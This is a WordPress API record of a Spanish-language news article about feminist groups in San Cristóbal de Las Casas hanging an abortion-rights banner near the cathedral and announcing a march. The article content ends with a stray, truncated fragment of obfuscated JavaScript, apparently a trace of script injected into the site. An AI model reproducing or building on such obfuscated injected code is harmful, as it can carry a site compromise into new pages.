{"id":5394,"date":"2022-09-26T03:06:13","date_gmt":"2022-09-26T03:06:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5394"},"modified":"2022-09-26T03:06:14","modified_gmt":"2022-09-26T03:06:14","slug":"en-chiapas-se-suman-a-la-jornada-por-la-despenalizacion-del-aborto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5394","title":{"rendered":"En Chiapas se suman a la Jornada por la despenalizaci\u00f3n del aborto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1-1024x682.jpeg\" alt=\"\" class=\"wp-image-5395\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-25-at-2.39.01-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- En el marco del 28 de septiembre &#8220;D\u00eda De Acci\u00f3n Global para la Despenalizaci\u00f3n del Aborto en Am\u00e9rica Latina y el Caribe&#8221;, La Red de Colectivas e Individualidades Feministas de los Altos de Chiapas en coordinaci\u00f3n con la Red de Justicia Reproductiva, Chiapas, colocaron un mensaje a la iglesia cat\u00f3lica en San Crist\u00f3bal, en la que piden un aborto libre.<\/p>\n\n\n\n<p>\u201cAborto libre\u201d, fue lo que se pudo leer en una m anta de color verde colocada sobre la iglesia de las rejas reci\u00e9n colocadas frente a la iglesia de la Catedral, as\u00ed como la cruz de la Plaza Catedral, esto ya que en diversas ocasiones la iglesia cat\u00f3lica se ha manifestado en contra.<\/p>\n\n\n\n<p>Es de mencionar que Mujeres activistas anunciaron que realizar\u00e1n una marcha el mi\u00e9rcoles 28 de este mes para exigir la despenalizaci\u00f3n del aborto, &#8220;ya que varias adolescentes y mujeres violadas sufren al tener un parto no deseado&#8221;.<\/p>\n\n\n\n<p>La marcha partir\u00e1 del Hospital de Las Culturas a partir de las 16:00 horas, hacia la Plaza de la Paz en el centro de San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>Entre otras acciones destacan; Conversatorios, festival art\u00edstico, exposici\u00f3n de fotograf\u00edas y eventos culturales, d\u00f3nde estar\u00e1n presentes v\u00edctimas que han sufrido violaciones o maltrato; &#8220;las feministas y v\u00edctimas y ciudadan\u00eda, qui\u00e9nes se unir\u00e1n a la marcha exigir\u00e1n la despenalizaci\u00f3n del aborto&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- En el marco del 28 de septiembre &#8220;D\u00eda De Acci\u00f3n Global para la Despenalizaci\u00f3n del Aborto en Am\u00e9rica Latina y el Caribe&#8221;, La Red de Colectivas e Individualidades Feministas de los Altos de Chiapas en coordinaci\u00f3n con la Red de Justicia Reproductiva, Chiapas, colocaron un mensaje a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5395,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5394","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5394"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5394\/revisions"}],"predecessor-version":[{"id":8697,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5394\/revisions\/8697"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5395"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}